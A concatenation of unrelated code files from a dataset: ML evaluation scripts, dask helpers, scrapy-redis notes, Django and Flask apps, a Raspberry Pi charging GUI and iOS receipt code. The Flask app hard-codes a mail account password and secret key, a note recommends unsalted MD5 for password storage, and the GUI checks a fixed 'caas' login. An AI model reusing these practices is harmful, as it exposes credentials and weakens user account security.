specificity = (TN / (TN + FP))\n FPR = 1 - specificity\n # re_call = (TP[c] / (TP[c] + FP))\n pre_cision = (TP[c] / (TP[c] + FN))\n f1_score = 2 * ((pre_cision * sensitivity) / (pre_cision + sensitivity))\n checking_c = c + 1\n if (checking_c == 1):\n D00_TPR_array.append(sensitivity)\n D00_FPR_array.append(FPR)\n elif (checking_c == 2):\n D01_TPR_array.append(sensitivity)\n D01_FPR_array.append(FPR)\n elif (checking_c == 3):\n D10_TPR_array.append(sensitivity)\n D10_FPR_array.append(FPR)\n elif (checking_c == 4):\n D11_TPR_array.append(sensitivity)\n D11_FPR_array.append(FPR)\n elif (checking_c == 5):\n D20_TPR_array.append(sensitivity)\n D20_FPR_array.append(FPR)\n elif (checking_c == 6):\n D40_TPR_array.append(sensitivity)\n D40_FPR_array.append(FPR)\n elif (checking_c == 7):\n D43_TPR_array.append(sensitivity)\n D43_FPR_array.append(FPR)\n else:\n D44_TPR_array.append(sensitivity)\n D44_FPR_array.append(FPR)\n\n print('Class {}\\nTP {}, TN {}, FP {}, FN {}'.format(c + 1, TP[c], TN, FP, FN))\n print('Sensitivity or Recall = {}'.format(sensitivity))\n print('Specificity = {}'.format(specificity))\n # print('Recall = {}'.format(re_call))\n print('Precision = {}'.format(pre_cision))\n print('F1 Score = {}'.format(f1_score))\n\n end_valid = time.time()\n print('Finished Epoch', epoch + 1, 'Validating in %0.2f minutes' % ((end_valid - start_valid) / 60))\n\n # Get the average loss for the entire epoch\n train_loss = train_loss / len(train_loader.dataset)\n valid_loss = 
val_loss / len(val_loader.dataset)\n\n record_accuracy = (accuracy / len(val_loader)) * 100\n print(\"Record Accuracy\", record_accuracy, \" in epoch\", display_epoch)\n accu_array.append(record_accuracy)\n\n # Print out the information\n print('Accuracy: %0.3f %%' % (accuracy / len(val_loader) * 100))\n print('Training Loss: {:.6f} ' '\\tValidation Loss: {:.6f}'.format(train_loss, valid_loss), '\\n')\n\n print('Total Time is %0.2f minutes' % ((end_valid - start_train) / 60))\n\nD00_TPR_array.append(1)\nD00_FPR_array.append(1)\nD01_TPR_array.append(1)\nD01_FPR_array.append(1)\nD10_TPR_array.append(1)\nD10_FPR_array.append(1)\nD11_TPR_array.append(1)\nD11_FPR_array.append(1)\nD20_TPR_array.append(1)\nD20_FPR_array.append(1)\nD40_TPR_array.append(1)\nD40_FPR_array.append(1)\nD43_TPR_array.append(1)\nD43_FPR_array.append(1)\nD44_TPR_array.append(1)\nD44_FPR_array.append(1)\n\nD00_TPR_array.sort()\nD00_FPR_array.sort()\nD01_TPR_array.sort()\nD01_FPR_array.sort()\nD10_TPR_array.sort()\nD10_FPR_array.sort()\nD11_TPR_array.sort()\nD11_FPR_array.sort()\nD20_TPR_array.sort()\nD20_FPR_array.sort()\nD40_TPR_array.sort()\nD40_FPR_array.sort()\nD43_TPR_array.sort()\nD43_FPR_array.sort()\nD44_TPR_array.sort()\nD44_FPR_array.sort()\n\n# Title\nplt.title('ROC Plot for DenseNet161')\n# Axis labels\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.plot(D00_FPR_array, D00_TPR_array, color='blue', linewidth=3, label='D00')\nplt.plot(D01_FPR_array, D01_TPR_array, color='green', linewidth=3, label='D01')\nplt.plot(D10_FPR_array, D10_TPR_array, color='orange', linewidth=3, label='D10')\nplt.plot(D11_FPR_array, D11_TPR_array, color='black', linewidth=3, label='D11')\nplt.plot(D20_FPR_array, D20_TPR_array, color='cyan', linewidth=3, label='D20')\nplt.plot(D40_FPR_array, D40_TPR_array, color='lavender', linewidth=3, label='D40')\nplt.plot(D43_FPR_array, D43_TPR_array, color='lime', linewidth=3, label='D43')\nplt.plot(D44_FPR_array, D44_TPR_array, color='coral', linewidth=3, label='D44')\nplt.legend()\nplt.show()\n\n# Title\nplt.title('Epoch Vs Accuracy for DenseNet161')\n# Axis labels\nplt.xlabel('Epoch')\nplt.ylabel('Accuracy')\nplt.plot(epoch_array, accu_array)\nplt.show()","sub_path":"Image_Classification/DenseNet161_Model.py","file_name":"DenseNet161_Model.py","file_ext":"py","file_size_in_byte":10260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33291547","text":"import numpy as np\nimport dask.array as da\n\ndef pad_arrays(arrays, constant_values, stack=True):\n \"\"\"\n Pad arrays with variable axis sizes. A bounding box is calculated across all the arrays and each sub-array is\n padded to fit within the bounding box. This is a light wrapper around dask.array.pad. 
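A minimal NumPy-only sketch of this bounding-box padding idea (an editor's illustration under stated assumptions, not part of the original module; pad_to_bounding_box is a hypothetical helper name):

import numpy as np

def pad_to_bounding_box(arrays, fill=0):
    # The bounding box is the per-axis maximum over all input shapes.
    bounds = np.array([a.shape for a in arrays]).max(0)
    return [
        np.pad(a, [(0, b - s) for s, b in zip(a.shape, bounds)],
               constant_values=fill)
        for a in arrays
    ]

# e.g. pad_to_bounding_box([np.ones((2, 3)), np.ones((3, 2))]) yields two 3x3 arrays.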
If `stack` is True,\n    the arrays will be combined into a larger array via da.stack.\n\n    Parameters\n    ----------\n    arrays : An iterable collection of dask arrays\n\n    constant_values : A number which specifies the fill value to use when padding.\n\n    stack : A boolean that determines whether the result is a single dask array (stack=True) or a list of dask arrays (stack=False).\n\n    Returns\n    -------\n    The padded arrays and a list of paddings.\n    \"\"\"\n\n    shapes = np.array([a.shape for a in arrays])\n    bounds = shapes.max(0)\n    pad_extent = [\n        list(zip([0] * shapes.shape[1], (bounds - np.array(a.shape)).tolist()))\n        for a in arrays\n    ]\n\n    # pad elements of the first axis differently\n    def padfun(array, pad_width, constant_values):\n        return np.stack([np.pad(a, pad_width, constant_values=cv) for a, cv in zip(array, constant_values)])\n    # If all the shapes are identical no padding is needed.\n    if np.unique(shapes, axis=0).shape[0] == 1:\n        padded = arrays\n    else:\n        padded = [\n            a.map_blocks(padfun,\n                         pad_width=pad_extent[ind][1:],\n                         constant_values=constant_values,\n                         chunks=tuple(c + p[1] - p[0] for c, p in zip(a.chunksize, pad_extent[ind])),\n                         dtype=a.dtype)\n            for ind, a in enumerate(arrays)]\n\n    return padded, pad_extent\n\n\ndef arrays_from_delayed(args, shapes=None, dtypes=None):\n    \"\"\"\n\n    Parameters\n    ----------\n    args: a collection of dask.delayed objects representing lazy-loaded arrays.\n\n    shapes: a collection of tuples specifying the shape of each array in args, or None. If None, the first array will be loaded\n    using local computation, and the shape of that array will be used for all subsequent arrays.\n\n    dtypes: a collection of strings specifying the datatype of each array in args, or None. If None, the first array will be loaded\n    using local computation and the dtype of that array will be used for all subsequent arrays.
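For a single lazy loader, the wrapping step this function automates looks roughly like the hedged sketch below (an illustration only; the delayed np.ones call stands in for a real on-disk read):

import dask
import dask.array as da
import numpy as np

# A delayed computation standing in for an expensive loader.
lazy = dask.delayed(np.ones)((4, 4))
# Declaring shape and dtype up front lets dask build the array without computing it.
arr = da.from_delayed(lazy, shape=(4, 4), dtype=float)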
Returns\n    -------\n    A list of dask arrays.\n    \"\"\"\n\n    if shapes is None or dtypes is None:\n        sample = args[0].compute(scheduler=\"threads\")\n        if shapes is None:\n            shapes = (sample.shape,) * len(args)\n        if dtypes is None:\n            dtypes = (sample.dtype,) * len(args)\n\n    assert len(shapes) == len(args) and len(dtypes) == len(args)\n\n    arrays = [\n        da.from_delayed(args[ind], shape=shapes[ind], dtype=dtypes[ind])\n        for ind in range(len(args))\n    ]\n    return arrays\n\n\n","sub_path":"fst/io/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"635787034","text":"import keras\nimport numpy as np\nimport tensorflow as tf\nfrom glob import glob\nimport pandas as pd\nfrom tqdm import tqdm\nimport keras.backend as K\nfrom keras.utils import np_utils\nfrom keras.models import load_model\n\nclass Ablation():\n\t\"\"\"\n\n\tA class for conducting an ablation study on a trained keras model instance\n\t\n\t\"\"\"\n\n\tdef __init__(self, model, weights_pth, metric, layer_name, test_image, gt, classes, nclasses=4):\n\t\t\n\t\t\"\"\"\n\t\tmodel : keras model architecture (keras.models.Model)\n\t\tweights_pth : saved weights path (str)\n        metric : metric to compare prediction with gt, for example dice, CE\n        layer_name : name of the layer which needs to be ablated\n        test_image : test image used for ablation\n        gt : ground truth for comparison\n        classes : class information which needs to be considered, class label as \n\t\t\t\tkey and corresponding required values \n\t\t\t\tin a tuple: {'class1': (1,), 'whole': (1,2,3)}\n        nclasses : number of unique classes in gt\n\t\t\"\"\"\t\t\n\n\t\tself.model = model\n\t\tself.weights = weights_pth\n\t\tself.metric = metric\n\t\tself.test_image = test_image\n\t\tself.layer = layer_name\n\t\tself.gt = gt\n\t\tself.classinfo = classes\n\t\tself.nclasses = nclasses\n\n\n\n\tdef ablate_filter(self, step=1):\n\t\t\"\"\"\n\t\tDrops individual weights from the model, makes the prediction for the test image,\n\t\tand calculates the difference in the evaluation metric as compared to the non-\n\t\tablated case. For example, for a layer with a weight matrix of shape 3x3x64, \n\t\tindividual 3x3 matrices are zeroed out at the interval given by the step argument.
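The occlusion step described above amounts to zeroing one output channel of a layer's kernel and bias; a hedged, standalone sketch (zero_out_filter is a hypothetical helper, not part of the BioExp API):

def zero_out_filter(layer, j):
    # For a Conv2D layer: kernel has shape (kh, kw, in_ch, out_ch), bias has shape (out_ch,).
    kernel, bias = layer.get_weights()
    kernel[..., j] = 0  # silence output filter j
    bias[j] = 0
    layer.set_weights([kernel, bias])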
\n\t\t\n\t\tArguments:\n\t\tstep: The interval at which to drop weights\n\n\t\tOutputs: A dataframe containing the importance scores for each individual weight matrix in the layer\n\t\t\"\"\"\n\n\t\tlayer_idx = 0\n\t\tfor idx, layer in enumerate(self.model.layers):\n\t\t\tif layer.name == self.layer:\n\t\t\t\tfilters_to_ablate = np.arange(0, layer.get_weights()[0].shape[-1], step)\n\t\t\t\tlayer_idx = idx\n\t\t \n\t\t#print('Layer = %s' %self.model.layers[self.layer].name)\n\t\tself.model.load_weights(self.weights, by_name = True)\n\n\t\t# predict each volume and save the results in an np array\n\t\tprediction_unshaped = self.model.predict(self.test_image, batch_size=1, verbose=0)\n\n\t\tdice_json = {}\n\t\tdice_json['feature'] = []\n\t\tfor class_ in self.classinfo.keys():\n\t\t\tdice_json[class_] = []\n\n\t\tfor j in tqdm(filters_to_ablate):\n\t\t\t#print('Perturbed_Filter = %d' %j)\n\t\t\tself.model.load_weights(self.weights, by_name = True)\n\t\t\tlayer_weights = np.array(self.model.layers[layer_idx].get_weights())\n\n\t\t\toccluded_weights = layer_weights.copy()\n\t\t\toccluded_weights[0][:,:,:,j] = 0\n\t\t\toccluded_weights[1][j] = 0\n\n\t\t\tself.model.layers[layer_idx].set_weights(occluded_weights)\t\t\t\n\t\t\tprediction_unshaped_occluded = self.model.predict(self.test_image,batch_size=1, verbose=0) \n\n\t\t\tdice_json['feature'].append(j)\n\t\t\tfor class_ in self.classinfo.keys():\n\t\t\t\tdice_json[class_].append(self.metric(self.gt, prediction_unshaped.argmax(axis = -1), self.classinfo[class_]) - \\\n\t\t\t\t\t \t\tself.metric(self.gt, prediction_unshaped_occluded.argmax(axis = -1), self.classinfo[class_]))\n\n\n\t\tdf = pd.DataFrame(dice_json)\n\t\treturn df\n\n","sub_path":"BioExp/spatial/ablation.py","file_name":"ablation.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"373411515","text":"\"\"\"\n\nSource: https://github.com/rmax/scrapy-redis\n\nThese notes cover:\n1. Scrapy-redis configuration\n2. Scrapy-redis distributed components\n3. Converting a spider into a distributed crawler\n4. Persistent storage\n\n\n\"\"\"\n\n\n###################\n# 1. Scrapy-redis configuration\n###################\n\n\"\"\"\n\nInstalling Redis on Windows:\n\n1. Download the program and unpack it\n2. Edit the config file; if the server is local, comment out the bind line\n3. Add it to the environment variables, open cmd as administrator and run redis-server to start\n\nOn Linux:\n\n1. sudo vi /etc/redis/redis.conf   # comment out the local-only bind to allow remote connections\n2. sudo redis-server /etc/redis/redis.conf   # start the server\n\nConnecting:\n\non the master host: redis-cli\nfrom other hosts: redis-cli -h master_ip\n\nOnce connected, start the distributed crawl:\nrun the distributed spider file: scrapy runspider ****.py\npush the starting url onto the queue under the key set in the spider file:\n\nlpush key(set in the file) starting_url\n\n\"\"\"\n\n\n########################\n# 2. Scrapy-redis distributed components\n########################\n\n\"\"\"\n\nSeveral machines complete one task together, which shortens the time the task takes to run.\n\nAdvantages: higher speed, and a single unstable node does not break the whole job.\n\nThe distributed component combines the redis database with the scrapy framework, making up for scrapy's inability to run distributed on its own.\n\nDifferences between scrapy and the scrapy-redis components:\n\n                     scrapy                                     scrapy-redis\nscheduler:           requests are handled in-process            requests are queued in the redis database\nDuplication Filter:  request fingerprints in a python set       deduplicated in a redis set\nitempipeline:        middleware deciding how items are handled  items are pushed onto a redis queue\nSpider:              a plain scrapy spider class                can fetch urls from redis\n\n\"\"\"\n\n#################\n# 3. Converting a spider into a distributed crawler\n#################\n\n\"\"\"\n\nSteps:\n1. Import the distributed spider class\nfrom scrapy_redis.spiders import RedisSpider\n\n2. Change the spider's base class\nclass XXXX(RedisSpider)\n\n3. Comment out allowed_domains and start_urls\n\n4. Fetch the allowed domains dynamically\ndef __init__(self, *args, **kwargs):\n    domain = kwargs.pop('domain', '')\n    self.allowed_domains = list(filter(None, domain.split(',')))\n    super(XXXX, self).__init__(*args, **kwargs)\n\n5. Add a redis_key\nredis_key = 'any value you like'\n\n6. Update the settings file\n\n(1)# Use the scrapy_redis duplicate filter in the scheduler\nDUPEFILTER_CLASS = \"scrapy_redis.dupefilter.RFPDupeFilter\"\n(2)# Use the scrapy_redis scheduler\nSCHEDULER = \"scrapy_redis.scheduler.Scheduler\"\n(3)# Whether the scheduler keeps the task queue; enabling this supports resuming interrupted crawls\nSCHEDULER_PERSIST = True\n\n# SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderPriorityQueue\"  # priority queue, the default\n# SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderQueue\"  # plain FIFO queue\n# SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderStack\"  # stack (LIFO)\n\n(4)ITEM_PIPELINES = {\n    # 'XXXX.pipelines.ExamplePipeline': 300,\n    # pushes scraped items onto the data queue in the redis database\n    'scrapy_redis.pipelines.RedisPipeline': 400,\n}\n(5)# Database connection\nREDIS_URL = \"redis://172.16.123.128:6379\"\n\n\n\"\"\"\n\n############\n# 4. Persistent storage\n############\n\n\"\"\"\n\nMove the item data stored in redis into another database.\n\nReason: redis is an in-memory database with limited capacity that loses data easily; MongoDB or SQL is normally used for long-term storage.\n\nDemo that saves into MongoDB:\n\n\"\"\"\n\nimport redis\nfrom pymongo import MongoClient\nimport json\n\n# connect to the redis database\nredis_cli = redis.Redis(host='master_ip', port=6379, db=0)\n# connect to mongo\nmongo_cli = MongoClient('127.0.0.1', 27017)\ndb = mongo_cli['xxx']\ncol = db['xx']\n\nwhile 1:\n    # read data from redis\n    source, data = redis_cli.blpop(['xxx:items'])  # returns a tuple: the key first, then the data\n    # the payload we want is in data; convert it to a dict and insert it into mongodb\n    dict_data = json.loads(data)\n    col.insert(dict_data)","sub_path":"python库/Scrapy/Scrapy-redis分布式.py","file_name":"Scrapy-redis分布式.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"447584231","text":"# Linked List, Two Pointers\n\n# Given a singly linked list, determine if it is a palindrome.\n#\n# Example 1:\n#\n# Input: 1->2\n# Output: false\n# Example 2:\n#\n# Input: 1->2->2->1\n# Output: true\n# Follow up:\n# Could you do it in O(n) time and O(1) space?\n\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution(object):\n    def isPalindrome(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: bool\n        \"\"\"\n        if head is None or head.next is None:\n            return True\n        slow, fast = head, head\n        # get the middle element\n        while fast != None and fast.next != None:\n            slow = slow.next\n            fast = fast.next.next\n\n        # reverse the first half of the linked list\n        p1 = None\n        p2 = head\n        while p2 != slow:\n            p3 = p2.next\n            p2.next = p1\n            p1 = p2\n            p2 = p3\n\n        # odd number case\n        if fast != None:\n            slow = slow.next\n\n        # check first half and second half\n        while p1 
!= None and slow != None:\n if p1.val != slow.val:\n return False\n p1 = p1.next\n slow = slow.next\n return True\n","sub_path":"LeetCode/234 Palindrome Linked List.py","file_name":"234 Palindrome Linked List.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"500303695","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import *\nfrom .models import *\n\n# Create your views here.\ndef homm(request,id):\n\n biz = Business.objects.all()\n\n post = Post.objects.filter(hood_id=id)\n\n activ = Activities.objects.all()\n\n post = Post.objects.filter(hood_id=id)\n return render(request, 'home.html', locals())\n\ndef register(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n form = UserCreationForm()\n\n return render(request,'signup.html',locals())\n\ndef search_business(request):\n \n if 'business' in request.GET and request.GET[\"business\"]:\n search_term = request.GET.get(\"business\")\n searched_business = Business.search_by_name(search_term)\n message = f\"{search_term}\"\n\n return render(request, 'search.html',locals())\n\n else:\n message = \"You haven't searched for any term\"\n return render(request, 'search.html',locals())\n\n\ndef hood(request):\n if request.method == 'POST':\n form = NeighbourHoodForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('location')\n else:\n form = NeighbourHoodForm()\n return render(request,'hood.html',locals())\n\ndef location(request):\n post = Post.objects.all()\n hood = NeighbourHood.objects.all()\n return render(request,'location.html')\n\n@login_required\ndef post(request):\n if request.method == 'POST':\n form = MakePostForm(request.POST,request.FILES)\n\n if form.is_valid():\n post=form.save(commit=False)\n post.save()\n return redirect('home',1)\n else:\n form = MakePostForm()\n return render(request,'post.html',locals())\n\n# @login_required\n# def search_business(request):\n\n# if 'business' in request.GET and request.GET[\"business\"]:\n# search_term = request.GET.get(\"business\")\n# searched_business = Business.search_by_business_name(search_term)\n# message = f\"{search_term}\"\n\n# return render(request, 'search.html',locals())\n\n# else:\n# message = \"You haven't searched for any term\"\n# return render(request, 'search.html',locals())\n\ndef profile(request):\n profile=Profile.objects.filter(user_id=request.user)\n \n return render(request, 'profile.html',{'profile':profile})\n\n\ndef update(request):\n all_profile = Profile.objects.all()\n profile = Profile.objects.get(user_id = request.user)\n if request.method == 'POST':\n form = UploadForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('profile')\n else:\n form = ProfileForm()\n\n return render(request,'new_profile.html', locals())\n\n\ndef editprofile(request):\n \n if request.method == 'POST':\n form = ProfileForm(request.POST,request.FILES)\n \n if form.is_valid():\n profile=form.save(commit=False)\n profile.user_id=request.user\n profile.save()\n return redirect('profile',request.user.id)\n else:\n form =ProfileForm()\n \n return render(request,'editprofile.html',locals())\n\n\ndef update_index(request):\n # all_profile = 
Profile.objects.all()\n profile = UserProfile.objects.get(user_id = request.user)\n if request.method == 'POST':\n form = UploadForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('profile')\n else:\n form = UploadForm()\n\n return render(request,'new.html', locals())\n\ndef biz(request):\n if request.method == 'POST':\n form = BizForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('home',1)\n else:\n form = BizForm()\n return render(request,'business.html',locals())\n\n\ndef activ(request):\n if request.method == 'POST':\n form = ActivForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('home',1)\n else:\n form = ActivForm()\n return render(request,'activities.html',locals())","sub_path":"hoodies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"79846476","text":"from guizero import App, Text, Combo, PushButton, info, TextBox,ButtonGroup\nfrom smbus import SMBus\nfrom time import sleep\nfrom firebase import firebase\naddr = 0x8\nbus = SMBus(1)\nids=[\"13322865231\"]\ndef tobytes(wrd):\n for c in wrd:\n bus.write_byte(addr,ord(c))\n\ndef dets(wrd):\n tobytes(wrd)\n if(wrd==\"id\"):\n x=11\n elif(wrd==\"SOC\"):\n x=5\n sleep(10)\n elif(wrd==\"START\"):\n x=8\n elif(wrd==\"STOP\"):\n x=7\n sleep(3)\n resp=\"\".join(map(chr, bus.read_i2c_block_data(addr,0,x)))\n return resp\n\ndef done():\n stopped=dets(\"STOP\")\n print(stopped)\n print(\"SOC:\"+\"{}\".format(r)+\"%\")\n info(\"Completed\", \" Charged to {}\".format(fs.value)+\"%\")\n fb_id=firebase.FirebaseApplication('https://caas-soc.firebaseio.com/')\n result=fb_id.post(\"https://caas-soc.firebaseio.com/{}\".format(id),{\"Charge Consumed:\":float(fs.value)-float(soc_init)})\n print(result)\n quit()\ndef check():\n global final\n global r\n final=fs.value\n r=float(dets(\"SOC\"))\n print(\"{}\".format(r)+\"%\")\n if(r=float(fs.value)):\n info(\"STATUS\",\"Already charged upto or more than {}\".format(fs.value)+\"%\")\n elif(r>=100):\n info(\"STATUS\", \"Charge Full\")\n done()\n\ndef get_charge(id,soc):\n global soc_final\n global charge\n global fs\n app1.hide()\n app.show()\n model = Text(app, text=\"ID:\"+id, grid=[1, 0], align=\"left\")\n charge=Text(app, text=\"State of charge: \"+\"{}\".format(float(soc))+\"%\",grid=[1,1], align=\"left\")\n final=Text(app,text=\"Desired final SOC:\",grid=[1,2],align=\"left\")\n fs=TextBox(app,grid=[2,2],align=\"left\")\n ch = PushButton(app,command=check, text=\"Charge\", grid=[1,3])\n\ndef do_check():\n if user_in.value == \"caas\":\n if pas_in.value == \"caas\":\n info(\"LOGIN\",\"Successfully logged in\")\n get_charge(id,soc_init)\nid=\"NA\"\nwhile(id not in ids):\n id=dets(\"id\")\n print(id)\nsoc_init=float(dets(\"SOC\"))\napp1 = App(title=\"Coimbatore Charging Station\")\nuser = Text (app1,text=\"Enter your Username\")\nuser_in = TextBox(app1)\npas = Text(app1,text=\"Enter your Password\")\npas_in = TextBox(app1)\nlogin = PushButton(app1,command = do_check,text=\"LOGIN\")\napp = App(title=\"Coimbatore Charging Station\", layout=\"grid\")\napp.hide()\napp1.display()\n\n\n\n\n\n","sub_path":"py_main.py","file_name":"py_main.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"369173860","text":"from flask import (Flask,render_template,\n 
redirect,url_for,request)\nfrom flask_mail import Mail\nfrom itsdangerous import URLSafeTimedSerializer\nfrom flask.ext.mail import Message\nfrom flask_wtf.csrf import CsrfProtect\nimport os\nimport logging\nimport forms\nimport sys\n\n\n\n\n\n##mail server \nMAIL_SERVER ='smtp.mail.yahoo.com'\nMAIL_PORT =465\nMAIL_USE_TLS = False\nMAIL_USE_SSL = True\n#\nMAIL_USERNAME = \"basuddem\"\nMAIL_PASSWORD = \"qwerasdzx01!\"\n\n\nDEFAULT_MAIL_SENDER = \"basuddem@yahoo.co.uk\"\n\n\nSECRET_KEY = \"tightly_guarded\"\n\n\nDEBUG = True\nPORT = 80\nHOST = \"127.0.0.1\"\n\n##create the app\napp = Flask(__name__)\napp.config.from_object(__name__)\n\nmail = Mail(app)\nCsrfProtect(app)\n#add a secret key since we be using sessions(for cryptographic signing of cookies)\napp.secret_key = os.urandom(24)\n##app.config['SECRET_KEY']\nts = URLSafeTimedSerializer(app.secret_key)\n\n\n\n##add the route to the registration form,\n##takes two methods post and get(able to load the view,\n##so they can see the form and\n##also post back to process the fom\n@app.route('/',methods=('GET','POST'))\ndef index():\n\n \n form = forms.Form()\n \n ##check if the form is submitted and valid\n if form.validate_on_submit():\n ##redirect user to the main page\n ##abstract form data\n name = form.name.data\n email = form.email.data\n phone_number = form.phone_number.data\n budget = form.budget.data\n choice = form.myField.data\n post = form.post.data\n \n subject = \"client information\"\n html = render_template(\n 'information.html',name = name, email= email ,phone_number = phone_number,\n budget = budget , choice = choice , post = post)\n msg = Message(\n subject= subject,\n recipients=['basuddem@yahoo.co.uk'],\n sender =DEFAULT_MAIL_SENDER,\n html=html\n )\n mail.send(msg)\n return redirect(url_for(\"index\"))\n ##if we don't redirect then\n return render_template(\"index.html\",form=form)\n\n@app.route('/index_fr',methods=('GET','POST'))\ndef index_fr():\n\n \n form = forms.Form()\n \n ##check if the form is submitted and valid\n if form.validate_on_submit():\n ##redirect user to the main page\n ##abstract form data\n name = form.name.data\n email = form.email.data\n phone_number = form.phone_number.data\n budget = form.budget.data\n choice = form.myField.data\n post = form.post.data\n \n subject = \"client information\"\n html = render_template(\n 'information.html',name = name, email= email ,phone_number = phone_number,\n budget = budget , choice = choice , post = post)\n msg = Message(\n subject= subject,\n recipients=['basuddem@yahoo.co.uk'],\n sender =DEFAULT_MAIL_SENDER,\n html=html\n )\n mail.send(msg)\n return redirect(url_for(\"index\"))\n ##if we don't redirect then\n return render_template(\"index_fr.html\",form=form)\n\n@app.route(\"/Team\",methods=('GET','POST'))\ndef team():\n form = forms.Form()\n \n ##check if the form is submitted and valid\n if form.validate_on_submit():\n ##redirect user to the main page\n subject = \"client information\"\n html = render_template(\n 'information.html')\n msg = Message(\n subject,\n recipients='basuddem@yahoo.co.uk',\n sender =DEFAULT_MAIL_SENDER,\n html=html\n )\n mail.send(msg)\n return redirect(url_for(\"team\"))\n ##if we don't redirect then\n return render_template(\"team.html\",form=form)\n \n\n\n@app.route(\"/address\",methods=('GET','POST'))\ndef address():\n form = forms.Form()\n \n ##check if the form is submitted and valid\n if form.validate_on_submit():\n ##redirect user to the main page\n subject = \"client information\"\n html = render_template(\n 
'information.html')\n        msg = Message(\n            subject,\n            recipients=['basuddem@yahoo.co.uk'],\n            sender = DEFAULT_MAIL_SENDER,\n            html=html\n        )\n        mail.send(msg)\n        return redirect(url_for(\"address\"))\n    return render_template(\"address.html\",form=form)\n\n\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.ERROR) \n\nif __name__ == '__main__':\n    ##initialize the models\n    \n    app.run(debug=DEBUG,host=HOST,port=PORT)\n    \n    \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"446386926","text":"'''\n# Module: hashlib\nOutline: notes on hashing, hash algorithms, hashing steps\nNotes:\n    1. Content hashed by this module cannot be decrypted back\n    2. Usage: store password hashes; hash the password the user types on every login and compare it against the hashed value stored in the database\nAlgorithms:\n    md5 sha256\nSteps:\n    1. m = hashlib.md5()      # get a hash object for the chosen algorithm\n    2. m.update(bytes data)   # feed it the data to hash\n    3. value = m.hexdigest()  # read out the hashed value\n'''\nimport hashlib\nm = hashlib.md5()\n#m = hashlib.sha256()\nm.update(\"你好\".encode(\"utf8\"))\n#print(m.hexdigest())\nvalue = m.hexdigest()\nprint(value)","sub_path":"03常用模块整理/07hashlib模块.py","file_name":"07hashlib模块.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"635978674","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\n\nfrom luckycommon.utils.decorator import sql_wrapper\nfrom luckycommon.model.iap_receipt import IAPReceipt, IAPInvalidReceipt\nfrom luckycommon.model import orm\n\n@sql_wrapper\ndef get_receipt_by_transaction_id(transaction_id):\n    return IAPReceipt.query.filter(IAPReceipt.id == transaction_id).first()\n\n@sql_wrapper\ndef get_invalid_receipt_by_hash_text(text):\n    return IAPInvalidReceipt.query.filter(IAPInvalidReceipt.id == text).first()\n\n\n\nSTATUS_CODE_DESCRIPTION= {\n    # App Store status code\n    '21000': 'The App Store could not read the JSON object you provided.',\n    '21002': 'The data in the receipt-data property was malformed or missing.',\n    '21003': 'The receipt could not be authenticated.',\n    '21004': '''The shared secret you provided does not match the shared secret on file for your account.\nOnly returned for iOS 6 style transaction receipts for auto-renewable subscriptions.''',\n    '21005': 'The receipt server is not currently available.',\n    '21006': '''This receipt is valid but the subscription has expired. When this status code\nis returned to your server, the receipt data is also decoded and returned as\npart of the response. Only returned for iOS 6 style transaction receipts for\nauto-renewable subscriptions.''',\n    '21007': '''This receipt is from the test environment, but it was sent to the production\nenvironment for verification. Send it to the test environment instead.''',\n    '21008': '''This receipt is from the production environment, but it was sent to the test\nenvironment for verification. 
